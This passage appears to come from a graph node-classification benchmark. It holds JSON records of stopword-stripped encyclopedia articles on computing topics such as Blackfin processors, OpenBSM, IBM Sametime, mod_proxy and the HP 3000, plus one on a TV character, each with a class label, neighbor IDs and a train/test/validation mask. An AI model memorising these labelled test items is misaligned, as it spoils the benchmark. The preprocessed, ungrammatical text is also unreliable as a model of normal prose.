    "text": "Blackfin:blackfin blackfin family 16-/32-bit microprocessors developed manufactured marketed analog devices processors built-in fixed-point digital signal processor dsp functionality supplied 16-bit multiply–accumulates macs accompanied on-chip microcontroller designed unified low-power processor architecture run operating systems simultaneously handling complex numeric tasks real-time h.264 video encoding blackfin processors use 32-bit risc microcontroller programming model simd architecture co-developed intel analog devices msa micro signal architecture architecture announced december 2000 first demonstrated embedded systems conference june 2001 incorporates aspects adi older sharc architecture intel xscale architecture single core combining digital signal processing dsp microcontroller functionality many differences core architecture blackfin/msa xscale/arm sharc combination designed improve performance programmability power consumption traditional dsp risc architecture designs blackfin architecture encompasses various cpu models targeting particular applications bf-7xx series introduced 2014 comprise blackfin+ architecture expands blackfin architecture new processor features instructions regarded blackfin core contextually dependent applications dsp features central blackfin two 16-bit hardware macs two 40-bit alus accumulators 40-bit barrel shifter four 8-bit video alus blackfin+ processors add 32-bit mac 72-bit accumulator allows processor execute three instructions per clock cycle depending level optimization performed compiler programmer two nested zero-overhead loops four circular buffer dags data address generators designed assist writing efficient code requiring fewer instructions applications use risc features include memory protection different operating modes user kernel single-cycle opcodes data instruction caches instructions bit test byte word integer accesses variety on-chip peripherals isa designed high level expressiveness allowing assembly programmer compiler optimize algorithm hardware features present standard blackfin assembly language written using algebraic syntax instead prefix commands used many assembly languages codice_1 codice_2 codice_3 blackfin assembly uses codice_4 codice_5 codice_6 blackfin uses byte-addressable flat memory map internal l1 memory internal l2 memory external memory memory-mapped control registers reside 32-bit address space programming point view blackfin von neumann architecture l1 internal sram memory runs core-clock speed device based harvard architecture instruction memory data memory independent connect core via dedicated memory buses designed higher sustained data rates core l1 memory portions instruction data l1 sram optionally configured cache independently certain blackfin processors also 64kb 256kb l2 memory memory runs slower core clock speed code data mixed l2 blackfin processors support variety external memories including sdram ddr-sdram flash nand flash sram blackfin processors also include mass-storage interfaces atapi sd/sdio support hundreds megabytes memory external memory space coupled core memory system dma engine operate peripherals main external memory processors typically dedicated dma channel peripheral designed higher throughput applications use real-time standard-definition d1 video encoding decoding architecture blackfin contains usual cpu memory i/o found microprocessors microcontrollers features enable operating systems blackfin processors contain memory protection unit mpu mpu provides protection caching strategies across entire memory space mpu allows blackfin support operating systems rtoss kernels like threadx µc/os-ii nommu linux although mpu referred memory management unit mmu blackfin documentation blackfin mpu provide address translation like traditional mmu support virtual memory separate memory addresses per process blackfin currently support operating systems requiring virtual memory wince qnx blackfin supports three run-time modes supervisor user emulation supervisor mode processor resources accessible running process however user mode system resources regions memory protected help mpu modern operating system rtos kernel typically runs supervisor mode threads/processes run user mode thread crashes attempts access protected resource memory peripheral etc exception thrown kernel able shut offending thread/process official guidance adi use blackfin non-os environments reserve lowest-priority interrupt general-purpose code software run supervisor space blackfin uses variable-length risc-like instruction set consisting 16- 32- 64-bit instructions commonly used control instructions encoded 16-bit opcodes complex dsp mathematically intensive functions encoded 32- 64-bit opcodes variable length opcode encoding designed code density equivalence modern microprocessor architectures blackfin instruction set contains media-processing extensions help accelerate pixel-processing operations commonly used video compression image compression decompression algorithms blackfin processors contain array connectivity peripherals depending specific processor peripheral control registers memory-mapped normal address space adi provides software development toolchains original visualdsp++ ide still supported last release 5.1.2 approaching end life support added new bf6xx bf7xx processors newer toolchain crosscore embedded studio uses upgraded versions compiler tools internally ui based eclipse cdt free version either tool available single-user license visualdsp++ costs 3500 usd crosscore embedded studio 995 usd options include green hills software multi ide gnu gcc toolchain blackfin processor family openembedded project national instruments labview embedded module microsoft visual studio use axiomfount axidotnet software several commercial open-source operating systems support running blackfin blackfin previously supported μclinux later linux nommu feature ever widely used longer maintainer support removed linux april 1 2018 4.16 last release include blackfin support",
    "neighbors": [
      8450,
      1029,
      1798,
      3847,
      7820,
      1298,
      11539,
      5785,
      9371,
      8861,
      1952,
      6818,
      3493,
      6950,
      6311,
      682,
      10796,
      4269,
      7341,
      7983,
      2224,
      4144,
      9391,
      10675,
      823,
      9911,
      2620,
      6207,
      7234,
      6084,
      3014,
      3142,
      3911,
      2761,
      10443,
      8268,
      9932,
      6607,
      9044,
      2517,
      1376,
      3168,
      10851,
      5094,
      8551,
      10985,
      9964,
      8048,
      4465,
      8944,
      10482,
      372,
      757,
      8700,
      2039,
      5880,
      249,
      3451,
      6268,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 1463,
    "label": 3,
    "text": "Address_generation_unit:address generation unit address generation unit agu sometimes also called address computation unit acu execution unit inside central processing units cpus calculates addresses used cpu access main memory address calculations handled separate circuitry operates parallel rest cpu number cpu cycles required executing various machine instructions reduced bringing performance improvements performing various operations cpus need calculate memory addresses required fetching data memory example in-memory positions array elements must calculated cpu fetch data actual memory locations address-generation calculations involve different integer arithmetic operations addition subtraction modulo operations bit shifts often calculating memory address involves one general-purpose machine instruction necessarily decode execute quickly incorporating agu cpu design together introducing specialized instructions use agu various address-generation calculations offloaded rest cpu often executed quickly single cpu cycle capabilities agu depend particular cpu architecture thus agus implement expose address-calculation operations also include advanced specialized instructions operate multiple operands time furthermore cpu architectures include multiple agus one address-calculation operation executed simultaneously bringing performance improvements capitalizing superscalar nature advanced cpu designs example intel incorporates multiple agus sandy bridge haswell microarchitectures increase bandwidth cpu memory subsystem allowing multiple memory-access instructions executed parallel",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      6256,
      630,
      8822,
      9851,
      6268,
      3197,
      7302,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      11447,
      8890,
      2237,
      4286,
      2241,
      2243,
      6339,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      780,
      6926,
      6415,
      1298,
      11539,
      7963,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      2383,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      9057,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      9092,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      7607,
      4030,
      453,
      3014,
      4046,
      8143,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      7151,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 1464,
    "label": 6,
    "text": "Record-oriented_filesystem:record-oriented filesystem computer science record-oriented filesystem file system data stored collections records contrast byte-oriented filesystem data treated unformatted stream bytes several different possible record formats details vary depending particular system general formats fixed-length variable length different physical organizations padding mechanisms metadata may associated file records define record length data may part record different methods access records may provided example sequential key record number record-oriented filesystems frequently associated mainframe operating systems os/360 successors dos/360 successors midrange operating systems rsx-11 vms record-oriented filesystems supported media direct access devices deck punched cards considered record-oriented file magnetic tape example medium support records uniform length variable length record file system programmer designs records may used file application programs accessing file whether adding reading updating records share understanding design records os/360 successors restriction bit patterns composing data record i.e delimiter character true systems e.g. rca file control processor fcp 301 501 601 3301 file comes existence file create request issued filesystem information file may included create request information may specify file fixed-length records records size along size records alternatively specification may state records variable length along maximum record length additional information including blocking factor binary vs. text maximum number records may specified permitted read beginning record next sequential read returns next collection data record writer intended grouped together may also permitted write beginning record cases record padded binary zeros spaces depending whether file recognized binary file text file operating systems require library routines specific record format included program means program originally expected read variable length record file read fixed length file operating systems must provide file system utilities converting files one format another means copying file requires additional storage space time coordination may necessary operating systems include various routines associate appropriate routine based file organization execution time either case significant amounts code manage records must provided protected routines ensure file integrity alternative record-oriented file stream stream file file system treats files unstructured sequence bytes applications may need impose record structure approach significantly reduces size complexity library reduces number utilities required maintain files common application convention text files represented streams use new line delimiter separate terminate records commonly cr crlf lf unfortunately cpu time required parse record delimiter significant exclusion record delimiter pattern data frequently undesirable alternate convention include length field record writer application responsible imposing record structure reader application responsible separating records record oriented file several advantages program writes collection data record program reads record understanding data collection although permitted read beginning record next sequential read returns next collection data record writer intended grouped together another advantage record length restriction bit patterns composing data record i.e delimiter character cost associated record oriented files length definition takes space magnetic tape definition takes form inter-record gap disk meta data area must allocated minimal file records length file composed varying length records maximum record length defined determine size length metadata associated record",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      1219,
      10951,
      8393,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10590,
      868,
      10596,
      2407,
      10087,
      1386,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7053,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 1465,
    "label": 2,
    "text": "OpenBSM:openbsm openbsm open source implementation sun basic security module bsm audit api file format bsm system used auditing describes set system call library interfaces managing audit records well token stream file format permits extensible generalized audit trail processing openbsm includes system include files appropriate inclusion operating system implementation audit libbsm implementation bsm library interfaces generating parsing managing audit records auditreduce praudit audit reduction printing tools api documentation sample /etc configuration files works progress include extensions libbsm api support easier audit trail analysis including pattern matching library openbsm derived bsm audit implementation found apple open source darwin operating system upon request apple relicensed bsd licence allow integration freebsd systems darwin bsm implementation created mcafee research contract apple since extensively extended volunteer trustedbsd team openbsm included freebsd version 6.2 later announced mac os x snow leopard feature",
    "neighbors": [
      1927,
      274,
      9625,
      1946,
      4636,
      2212,
      10535,
      9646,
      7983,
      11698,
      11573,
      1718,
      5177,
      5819,
      8637,
      704,
      9665,
      11459,
      8266,
      8395,
      7249,
      850,
      10455,
      6361,
      9306,
      6491,
      7521,
      1891,
      998,
      4073,
      9201,
      3058,
      7027,
      5492,
      2421,
      9844,
      2424,
      1273,
      2045,
      2558,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 1466,
    "label": 4,
    "text": "Arthur_\"Artie\"_Nielsen:arthur quot artie quot nielsen agent arthur artie nielsen née arthur weisfelt fictional character u.s. television science fiction series warehouse 13 2009–2014 portrayed saul rubinek special agent charge warehouse 13 immediate supervisor agents pete lattimer myka bering claudia donovan artie nielsen born arthur weisfelt july 2 1948 grows philadelphia pennsylvania russian jewish heritage father izzy weisfelt judd hirsch taught musical composition temple university young artie gifted pianist earns admission juilliard school rather continuing musical training goes work national security agency nsa stands 5 feet 8 inches tall addition english fluent russian german french also read latin chief custodian warehouse 13 artie understands many secrets revealed season 1 episode implosion nsa recruits artie right school 20s works cryptographer code breaker decoding soviet communications intercepting letters phone transcripts suspected selling secrets soviets makes contact one persons spying put surveillance november 18 1978 arrest warrant issued charges espionage treason season 2 episode vendetta revealed artie actually trading artifacts exchange release family members political prisoners gulag believes artifacts nothing trinkets antiques old relics soviet contact lets slip artifacts power artie soon discovers frightening dangerous powers unable live guilt done turns day mrs. frederic comes life offering chance make amends past mistakes gets charges expunged given new identity arthur nielsen change name hide u.s. government soviets consider spy betrayed artie nielsen joins u.s. secret service becomes warehouse agent season 1 episode claudia learn 12 years earlier artie poses professor order get close graduate student joshua donovan help attempts teleportation research using rheticus compass – artifact artie mission retrieve unfortunately watches helplessly joshua younger sister claudia donovan joshua disappears apparently killed experiment compass incident causes artie much grief pushed joshua continue experiment promised claudia would whatever could help keep safe later discovered joshua trapped inter-dimensional space persuaded claudia armed new information compass artie helps reproduce experiment rescue joshua artie partnered fellow warehouse agent james macpherson falling macpherson disappears 15 years starting season 1 episode implosion macpherson returns artie ’ nemesis – collecting auctioning artifacts release back world season one finale macpherson macpherson blows umbilicus artie still inside presumably killing season 2 premiere time tell learn artie saved phoenix artifact rises ashes soon thereafter macpherson captured killed season 2 vendetta artie one opposed reinstatement h. g. wells vindicated season two finale reset h.g revealed villain revealed season 3 finale stand preparing sykes attack warehouse artie takes watch macpherson gave hoping would never use warehouse destroyed pete exclaims lost artie lost artie reveals watch says yet season 4 premiere new hope artie discovers pandora box destroyed warehouse result world lost hope realizing watch lead fail safe reset 24 hours artie claudia pete myka set find artifact fail safe revealed astrolabe ferdinand magellan artie pete find last piece astrolabe attacked templar group possession astrolabe pete killed artie prepares use astrolabe dying leader templars says using astrolabe artie bring great evil design upon artie uses astrolabe goes back time prevents warehouse destroyed result actions h.g wells mrs. frederic pete still alive artie later nightmare claudia attacking dagger waking learns leena claudia left artie approached brother adrian templars asking assistance finding person used astrolabe insisting must used restore timeline prevent creation evil adrian discovers artie user astrolabe threatens destroy life work stealing unleashing artifacts warehouse artie undoes done artie behavior becomes erratic approached mrs. frederic leena h. g. wells episode second chance reveals story astrolabe brother adrian vision claudia dagger artie suggests evil may claudia mrs. frederic points adrian actions make likely suspect episode ones love leena witnesses artie midst supposed confrontation adrian observes alone imagining adrian presence reality artie stealing unleashing artifacts leena confronts witnessed artie tormented tries understand happening although warned mrs. frederic flee warehouse leena approaches artie effort help artie taken evil personality turns leena kills episode fall revealed artie evil plan release deadly disease english sweating sickness world must use dagger vision break open container encasing chinese orchid warehouse 8 although pete myka claudia steve try retrieve artifacts get artie successful unleashes disease episode reaches closing climax somehow knowing dagger separate true artie evil residing inside claudia picks stabs thereby fulfilling artie vision second half season 4 episode living dead begins artie air-lifted back warehouse 13 suffered physical injury dagger retreated mind wanting come coma face memory act killing leena jane lattimer uses sigmund freud desk clock link claudia steve artie subconscious inside see mind shutting artie uses representations vanessa calder james macpherson get pair mind claudia eventually rescues artie brings back coma parks rehabilitation regents absolve artie wrongdoing leena death clearly controlled astrolabe nonetheless artie stricken great grief guilt leena loss life hand back warehouse begins take leena chores responsibilities initially refusing overtures myka steve help eventually convince artie pulling together helping accomplish chores get past loss leena big snag steve becomes concerned artie acting recklessly putting danger reports adwin kosan regents take action assigning dr. abigail cho warehouse 13 introduced artie mrs. frederic sky limit new owner leena b b abigail psychotherapist whose real mission help artie deal grief killing leena artie discovers dismisses hostility however keeps explaining continues deal grief alone consume artie eventually realizes n't know deal loss turns abigail help artie secretive person people lost life including agents shuts everyone defense mechanism withholds information tends give enough information agents mission hand without answering many questions obsesses minutiae point neurosis known past leap conclusions based precious little evidence beyond gut instinct artie frequently tries protect people forged relationships either making promises whether keep swearing potential attackers wo n't allow harm come cares noticeably religious man studied talmud enough least able quote artie prefers old-fashioned items ways things familiar comfortable necessarily likes better one instance finds important document office card catalogue exclaiming google shmoogle ’ stick paper season 2 episode 13.1 reluctantly allows global dynamics geek come warehouse 13 upgrade antiquated computer systems claudia describes douglas fargo artie would vetoed fire 'd born years earlier nonetheless artie generally adept using modern technology must artie former code breaker nsa adept noticing patterns calculating probability high level knowledge various subjects make effective job although seems trouble remembering dates macpherson mrs. frederic correct couple occasions thirty-plus years warehouse agent taught unpredictable nature artifacts causing proceed caution situation access warehouse computer system artie access information around globe shows expert computer hacking skills obviously better claudia though prefers use computers also able improvise gadgets household items made electromagnet iron merge caution used broken windshield tesla overload pete ocular input around bend artie opposed using artifacts duties warehouse agent usually carries around black kit bag similar commonly called doctor bag random assortment artifacts used various situations confirmed artie also great deal stronger appears several times series shown knocking attacker one punch izzy weisfelt judd hirsch although artie good relationship father izzy childhood become estranged adults revealed season 2 episode secret santa artie parents sacrifice working multiple jobs get juilliard artie walks away music join nsa izzy feels betrayed disowns son artie changes identity contact 30 years claudia unexpectedly meets izzy talks coming south dakota telling artie dying artie meet make amends renew relationship aleksandr revealed season 2 episode vendetta aleksandr artie soviet contact time trading artifacts exchange release family members gulag artie turns u.s. authorities aleksandr becomes liability soviet government imprisoned although relationship merely one necessity artie remorseful aleksandr fate stating n't know 'd punished thirteen years aleksandr dies prison son ivan unsuccessfully seeks retribution artie mrs. frederic c. c. h. pounder learn season 1 episode implosion mrs. frederic responsible artie recruitment warehouse starting relationship endured least 30 years despite long association artie n't learn first name overhears regent calling irene 10th episode season one breakdown regents consider artie fitness continue job agent charge warehouse 13 mrs. frederic backs convinces best agent warehouse ever despite impersonal outward appearance relationship mrs. frederic cares great deal artie artie reciprocates giving mrs. frederic respect loyalty hugo miller rené auberjonois introduced season 2 episode 13.1 hugo warehouse agent time artie arrival friendly often played board games together though persistent cheating practical jokes annoyed artie institutionalized years half brain downloaded computer mind made whole artie reverses process using artifact causes initial separation result hugo feels indebtedness artie reveal episode love sick much artie dismay hugo long ago relationship vanessa calder james macpherson roger rees revealed appearance jane lattimer memories season 3 episode shadows partnership artie james dates back 30 years ago near time artie first arrived warehouse 13 partnership lasted 15 years close friends seen season 1 episode macpherson disagreements develop james eventually turns villainous behavior james reappears episode implosion artie begins relentlessly pursuit season 2 premiere time tell james lies dying artie arms expresses remorse done despite differences drove apart artie feels grief loss death good friend carol augustine lynne cormack artie partnership james macpherson men vie affection carol carol eventually chooses james married james use phoenix artifact save carol fire drives final wedge artie james imprisoned carol blames artie claiming responsible artie meet season 1 episodes implosion macpherson artie displays ill toward though carol still bitter artie insists simply chose poorly choosing james joshua donovan tyler hynes season 1 episode claudia see joshua work rheticus ’ compass impresses artie bolstered artie encouragement joshua pushes experiment results apparent death although tragedy artie claims feel guilt incident joshua rescued interdimensional space artie admits responsibility regret joshua lost 12 years elements artie vouches joshua helps land position cern leena genelle williams despite leena youthful appearance implied artie relationship long pre-dates start series one glimpses past leena states yet around everything went artie macpherson artie leena spend frequent time together warehouse usually working sometimes enjoying one another company artie values leena opinions frequently relies aura-reading ability often deferring leena also looks artie maternal way making sure eats right season 4 episode ones love artie use magellan astrolabe taken evil personality kills leena gunshot tries help freed control astrolabe artie feels great grief guilt leena death knowing hand killed episode sky limit seeks consul psychologist abigail cho telling killed someone love n't know pete lattimer eddie mcclintock artie often annoyed pete playful nature catches playing timothy leary eyeglasses finds reliable capable agent unlike clashes myka artie relationship pete largely free conflict association develop respect fondness episode team fearing pete becoming occupied job warehouse artie tells n't miss real life like pete replies 'd honored life like season 4 premiere new hope retrieving artifact reverse time pete mortally wounded life slips away pete asks 'll remember dying artie travels back time sets everything right artie answers wo n't remember seconds later pete passes artie adds hollow expression face revealing much truly cares pete defending pete myka regents artie says agents lattimer bering mean 've repeatedly shown bravery 've shown quick-thinking 're excellent team 're probably best agents warehouse ever myka bering joanne kelly much first season artie myka strained relationship resents artie compulsive secrecy believes pete treated 're expendable artie reacts notice word secret job description job follow instructions episode duped myka explains artie needs know fighting chance field thinks artie great wants think admitting erred relationship improves clash season 2 episodes vendetta myka advocates reinstatement h. g. wells decision artie adamantly opposes incident causes friction relationship soon returns normal despite disagreements artie myka develop deep affection frequently display time tell myka reacts elation upon seeing artie rise ashes exploded umbilicus age beauty artie deeply troubled myka falls victim rapid aging artifact also witness artie emotion new guy upon seeing myka returned warehouse simply uttering good satisfying smile face daniel dickinson simon reynolds artie experiences difficulty dickinson series early episodes dickinson first tries get agents transferred back washington pete myka contact dickinson help warehouse case forcing artie forbid contact episode resonance artie accuses dickinson hacking warehouse computers though later discovered breach initiated elsewhere despite difficulties never personal dickinson murdered season 2 episode vendetta artie feels remorse discovers murder weapon artifact traded soviets claudia donovan allison scagliotti revealed season 1 episode claudia artie claudia first meet 12 years earlier incident rheticus compass blaming artie happened brother joshua seeks forceful persuasion rescues joshua claudia grateful claudia nowhere go artie feeling responsible offers job warehouse accepts although start occasional squabbles time develop deep father-daughter-like affection—a relationship means great deal claudia since lost parents young although claudia often makes jokes artie expense usually age also outwardly affectionate unaccustomed hugs gift giving artie often appears uncomfortable claudia gestures season 2 episode age beauty see artie uneasiness role father figure attempt advise teenage claudia matter romance ends awkward exchange reset artie recovers gunshot wound claudia breaks tears thought something grave befalling assures kiddo hey plan making life hell long time season 3 episode trials artie secretly follows claudia first lead assignment like proud parent wants see succeed regents artie first 30 years warehouse contact regents rare occurrence first meeting regents en masse occurs season 1 episode breakdown artie service warehouse review subordinate position artie relationship regents typically businesslike revealed monologue beginning 40th floor artie admires regents considers protection priority helena g. wells jaime murray artie learns debronzing h. g. wells first considers dangerous threat must neutralized angered learning myka contact helena without telling season 2 episode vendetta helena convinces regents longer threat reinstated warehouse agent artie refuses welcome team convinced still dangerous feelings helena begin soften somewhat episode struggles repair time machine save lives pete myka artie distrust helena vindicated revealed villain attempts initiate worldwide disaster season 2 finale reset although helena remorse actions wins myka trust artie easily swayed helena heroic actions selfless sacrifice season 3 finale stand artie finally convinced sincerity reverses time season 4 premiere new hope artie memory helena heroic sacrifice surprise mrs. frederic regent kosan artie vehemently advocates helena freedom vanessa calder lindsay wagner season 2 episode team artie discovered re-growing appendix invite visit official warehouse physician dr. vanessa calder urged pete artie gathers nerve ask vanessa join walk town accepts artie sees vanessa collaborate case season 3 episode love sick agree dinner date hugo miller arrives artie learns vanessa couple fears get back together heartbroken artie confides claudia given line work advanced years pretty much made peace fact would find romantic companionship love vanessa stated hope false hope would seem end episode vanessa tells artie sees appreciates woman hugo sees young woman although vanessa must return home atlanta kisses artie tells owes dinner season 4 episode fractures revealed artie vanessa pursuing long-distance relationship artie feels time right take things 'to next level however date interrupted alice escape lewis carroll mirror vanessa nearly killed alice act revenge artie ends relationship vanessa thinking protect vanessa tells artie wait figures cutting love bad idea steve jinks aaron ashmore new guy warehouse 13 artie relationship steve evolved developed pete myka claudia portrayed however steve fits well warehouse family episode stand see artie grieving loss steve feeling partly responsible upset mrs. frederic telling steve working undercover jane lattimer kate mulgrew although artie jane crossed paths 30 years revealed jane memories episode shadows unclear whether knew identity time first contact present timeline occurs season 3 episode 40th floor artie appears recognize likely previous contact passing association thus far undeveloped since artie responsible jane son pete shares relationship personal one shares regents abigail cho kelly hu season 4 episode sky limit abigail introduced artie mrs. frederic new owner leena b b artie soon discovers abigail psychotherapist true purpose help deal grief killing leena artie initial response hostility wants nothing abigail psychoanalysis however persists pressuring artie allow help artie eventually realizes n't know deal loss turns abigail help",
    "neighbors": [
      4956,
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 1467,
    "label": 5,
    "text": "IBM_Sametime:ibm sametime ibm sametime formerly ibm lotus sametime client–server application middleware platform provides real-time unified communications collaboration enterprises capabilities include presence information enterprise instant messaging web conferencing community collaboration telephony capabilities integration sold lotus software division ibm ibm sametime middleware supports enterprise software business process integration communication enabled business process either ibm sametime plugin surfacing ibm sametime capabilities third-party applications ibm sametime integrates wide variety software including lotus collaboration products microsoft office productivity software portal web applications ibm sametime client–server enterprise application includes ibm sametime connect client end-users ibm sametime server control administration ibm sametime comes 4 levels functionality ibm sametime limited use old name ibm sametime entry provides basic presence instant messaging ibm sametime standard provides additional functionality ibm sametime entry including ibm sametime advanced provides additional real-time community collaboration social networking functionality ibm sametime standard including ibm sametime unified telephony provides additional telephony functionality ibm sametime standard ibm sametime advanced including ibm sametime gateway provides server-to-server interoperability disparate communities conversion services different protocols presence information awareness instant messaging ibm sametime gateway connects ibm sametime instant messaging cooperate communities external communities including external ibm sametime public instant messaging communities aol aim icq yahoo google talk xmpp ibm sametime gateway replaces sametime session initiation protocol sip gateway earlier releases ibm sametime ibm sametime gateway platform based ibm websphere application server provides failover clustering scalability ibm sametime gateway deployment product shipped following connectors virtual places sip xmpp protocol connectors may added ibm sametime middleware supports application business process integration within context real-time communications often referred communications enabled business processes sametime integrates either two ways examples integration ibm sametime applications include ibm sametime connect client component ibm sametime built eclipse platform allowing developers familiar framework easily write plug-ins ibm sametime uses proprietary protocol named virtual places also offers support standard protocols including session initiation protocol sip simple t.120 xmpp h.323 ibm sametime connect run microsoft windows linux macos also available zero-download web client microsoft internet explorer mozilla firefox apple safari mobile clients also supported apple iphone android microsoft windows mobile rim blackberry symbian ibm sametime server runs microsoft windows ibm aix ibm formerly i5/os linux solaris sametime also accessed using free software adium gaim pidgin kopete clients ibm sametime became ibm product 1998 synthesis technologies ibm acquired two companies sametime v3.1 client part standard platform loaded ibm standard software installer issi many years enabling communications corporate intranet hundreds thousands ibm employees next major release sametime v7.5 client built eclipse software platform enabling use plug-in framework 2008 gartner positioned ibm first time leader gartner unified communications magic quadrant",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      4746,
      1036,
      6797,
      11408,
      3610,
      3228,
      10271,
      3105,
      9511,
      1962,
      8622,
      7983,
      9519,
      8758,
      823,
      8122,
      6208,
      1218,
      6982,
      6855,
      2760,
      1738,
      2892,
      6993,
      3284,
      4318,
      3168,
      8416,
      3812,
      4068,
      6628,
      9572,
      488,
      5612,
      11116,
      7407,
      3959,
      7928,
      3323,
      10748,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1468,
    "label": 8,
    "text": "Mod_proxy:mod proxy mod_proxy optional module apache http server module implements proxy gateway cache apache implements proxying capability ajp13 apache jserv protocol version 1.3 ftp connect ssl http/0.9 http/1.0 since apache 1.3.23 http/1.1 module configured connect proxy modules protocols one powerful feature apache flexible virtual hosting—multiple virtual hosts single server convenient way partition separate websites applications mod_proxy possible set various web framework-based applications virtual hosts well mod_proxy help improve lamp security strip ssl http requests module experimental apache 1.1.x apache 1.2 mod_proxy stability greatly improved since apache 2.0 proxy features divided several modules addition mod_proxy mod_proxy_http mod_proxy_ftp mod_proxy_connect — moreover caching provided mod_cache related modules since apache 2.2 mod_proxy_ajp mod_proxy_balancer added well apache 2.4 mod_proxy_fcgi also added proxy fastcgi requests another server superseding mod_fcgid mod_fastcgi",
    "neighbors": [
      7430,
      1802,
      10506,
      9229,
      11154,
      1556,
      11668,
      10020,
      10026,
      7212,
      10284,
      4658,
      2485,
      4797,
      5314,
      7364,
      8644,
      11466,
      3920,
      5849,
      5593,
      6366,
      865,
      7784,
      9834,
      8689,
      9841,
      4725,
      124,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 1469,
    "label": 3,
    "text": "HP_3000:hp 3000 hp 3000 series family minicomputers released hewlett-packard 1972 designed first minicomputer delivered full featured operating system time-sharing first model 3000 withdrawn market 1973 speed improvements os stability could achieved reintroduction 1974 ultimately became known reliable powerful business system one regularly hp business companies using ibm mainframes hewlett-packard initial naming referred computer system/3000 called hp3000 hp later renamed computer hp e3000 emphasize system compatibility internet web uses early 3000 models large cabinets front panels later models made fit desks using terminal consoles diagnostics bootstrap routines rom 1984 hp introduced hp3000 series 37 first model ran offices without special cooling flooring requirements models ranged system sometimes used single user models supported 2,000 users hp 3000 one last proprietary minicomputer systems whose manufacture curtailed vendor outlasting pdp-11-descended digital equipment corporation vax acquired compaq ultimately hewlett-packard almost 30 years five-year phase-out period now-named hp e3000 series servers originally announced november 2001 hp extended phase-out period twice new e3000s sold hp although used systems continue sold upgrades third-party reseller market support hp customers hp 3000 continued dec. 31 2010 many third party firms continue support system customers throughout world customers continue use hp 3000 companies worldwide especially manufacturing e-commerce industries others migrated business server systems made hp others unable unwilling migrate homesteading strategy emerged immediately hp announcement end system sales 2012 stromasys company released product full hp3000 hardware emulation x86-64 servers running red hat linux centos product operates virtualized instance hp 3000 server hardware starting 2003 hp began plan sell license 3000 operating system let 3000 customers run software stromasys product known hpa/3000 key development led tremendous success hp 3000 bundling hp-developed network database management system dbms called image called turboimage/sql reputedly inspired total dbms developed cincom systems inc image award-winning database anointed datamation within two years database introduction first database management system included business-class minicomputer bundling image server hp created ecosystem applications development utilities could rely upon image data repository hp 3000 code reentrant data reside separate variable-length segments 32,768 halfwords 16-bit words 65,536 bytes operating system known mpe multi-programming executive loads code segments program files segmented library sl files needed 256 segments one process could much 64kb memory code segment calling routine based segment number routine number within segment program could theoretically 32,385 routines 8 bits specify segment 16 bits within segment program could effectively 24 bit address 16mb compared 16 bit computers like pdp-11 ibm system/34 64kb address space code data bigger limitation data segment stack segment also 64kb shared library routines permit cross-process global data since process data segment procedures worked around requiring caller pass array stack data segment hold state information similar modern object oriented languages methods applied objects passed allocated caller process could allocate use multiple extra data segments xds 64kb classic architecture imposed limit 65,535 extra data segments system-wide limitations would usually restrict somewhat smaller limit systems programming done spl system programming language algol-like language allowing inline assembler direct access instruction set standard terminals hp 3000 hp 2640 series supported block mode data entry forms like ibm mainframe-based cics well character mode 1980s computer gained ability use pcs macs system terminals hp 3000 family generations divided classic 16-bit xl later ix 32-bit families following introduction systems based hp pa-risc chips 3000s early 1987 newer xl systems binary compatible classics would transparently run classic code via emulator one hp integrated mpe xl operating system classic code could optionally translated native pa-risc code via octcomp object code translator/compiler ... code ran native speed still subject classic stack memory size limitations earlier classic machines based custom cisc processor 1988 onward hp 3000s using pa-risc processors began shipping volume 1995 pa-risc systems effectively displaced older family machines use technology shifts remained significant residue older machines service even today original classic 3000s work production locations hp 3000 many hp 9000 machines used hp precision bus pa-risc based hp 3000 operating system written primarily modcal hp extended version pascal large portions earlier mpe v operating system written spl still used part mpe xl mpe/ix pa-risc subsystems e.g. turboimage written pspl portable spl small portion mpe xl mpe/ix written pa-risc assembly language 3000 series operating system originally styled multi-programming executive mpe later called mpe xl posix compliance added versions 5.0-5.5 mpe/ix earliest versions system used hp proprietary spl systems programming language basic system 